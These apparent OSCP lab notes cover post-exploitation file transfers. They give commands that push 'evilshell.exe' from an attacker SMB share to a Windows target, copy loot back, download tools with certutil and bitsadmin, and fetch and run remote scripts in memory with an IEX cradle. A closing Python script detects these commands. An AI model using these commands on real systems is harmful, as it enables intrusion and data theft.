

File Transfers

Using Windows SMB:

Transferring Files from Linux to Windows (post-exploitation) - ropnop blog

Stand up an Impacket SMB server (share name JOEY, serving the loot directory) with:

python /var/lib/impacket/examples/smbserver.py JOEY /root/cybersecurity/Offensive\ Security/OSCP/lab-pentest/public/results/10.11.1.5/loot/

To transfer files from the attacking host to the Windows target, use:

copy \\192.168.119.172\JOEY\evilshell.exe innocentfile.exe

To transfer files from the Windows target back to the attacking host, use:

copy juicyfile.txt \\192.168.119.172\JOEY\

HTTP Server

Spawning Python HTTP Server

python -m SimpleHTTPServer

By default this starts an HTTP server on port 8000 serving the current directory (Python 2 module; the Python 3 equivalent is python3 -m http.server). If the shared directory contains an index.html, the server returns that page instead of the directory listing, so files are then only reachable by their direct URL.

Use the following bash one-liner to serve files from the /usr/share/webshells/cfm/ directory without changing into it:

pushd /usr/share/webshells/cfm/; python -m SimpleHTTPServer; popd;

File Download from Windows

To download files on a Windows client using CertUtil (note: AV will often trigger on this!):

certutil.exe -urlcache -split -f http://10.10.15.136/winPEAS.exe

A better option is to use bitsadmin:

bitsadmin /Transfer myJob http://192.168.49.105/file.txt C:\Users\student\enc.txt

Remote Script Execution

Use the following to fetch a script from a remote HTTP server and execute it in memory on the local Windows machine (note: this is NOT proxy-aware):

IEX(New-Object Net.webClient).downloadString('http://192.168.49.105/bchat.txt')

A better, proxy-aware alternative is the following one-liner:

$webclient=(New-Object Net.WebClient);$webclient.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $webclient.DownloadString("")

File Upload with wget

Upload a file with an HTTP PUT request. The receiving server must accept PUT; Python's SimpleHTTPServer above only serves GET/HEAD and does not implement PUT:

wget --method PUT --body-file=./file.pdf http://192.168.119.172:8000/file.pdf -O - -nv
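As an added defender's example (not part of these notes), the following Python flags the transfer primitives used above (certutil -urlcache, bitsadmin /Transfer, the IEX/DownloadString cradle, and copy from an IP-addressed UNC share) in process-creation command lines such as Sysmon Event ID 1 or Security 4688. The sample command lines are constructed, and the rule names are my own.

```python
import re

# Constructed sample CommandLine values (not real telemetry). The last two are
# benign uses of the same binaries and must not be flagged.
SAMPLE_CMDLINES = [
    r"certutil.exe -urlcache -split -f http://10.10.15.136/winPEAS.exe",
    r"bitsadmin /Transfer myJob http://192.168.49.105/file.txt C:\Users\student\enc.txt",
    r"powershell -c IEX(New-Object Net.webClient).downloadString('http://192.168.49.105/bchat.txt')",
    r"cmd.exe /c copy \\192.168.119.172\JOEY\evilshell.exe innocentfile.exe",
    r"certutil.exe -hashfile C:\Windows\notepad.exe SHA256",
    r"bitsadmin /list /allusers",
]

# (technique label, regex). Case-insensitive because cmd.exe and PowerShell
# ignore case; the cradle rule needs both the fetch and the execute primitive.
RULES = [
    ("certutil download", re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)),
    ("bitsadmin download", re.compile(r"bitsadmin(\.exe)?\b.*/transfer\b.*\bhttps?://", re.I)),
    ("PowerShell download cradle",
     re.compile(r"(?=.*downloadstring)(?=.*\b(?:iex|invoke-expression)\b)", re.I)),
    ("copy from UNC share", re.compile(r"\bcopy\b\s+\\\\\d{1,3}(?:\.\d{1,3}){3}\\", re.I)),
]

URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def classify(cmdline):
    """Return the labels of every rule that matches this command line."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def scan(cmdlines):
    """Return (command line, labels, remote URL or None) for each flagged line."""
    findings = []
    for cl in cmdlines:
        labels = classify(cl)
        if labels:
            m = URL_RE.search(cl)
            findings.append((cl, labels, m.group(0) if m else None))
    return findings


if __name__ == "__main__":
    for cl, labels, url in scan(SAMPLE_CMDLINES):
        print(f"{', '.join(labels):28} url={url!s:40} {cl}")
```

Pair the command-line match with network telemetry (the destination IP in the URL or UNC path) to confirm the transfer actually happened rather than alerting on the string alone.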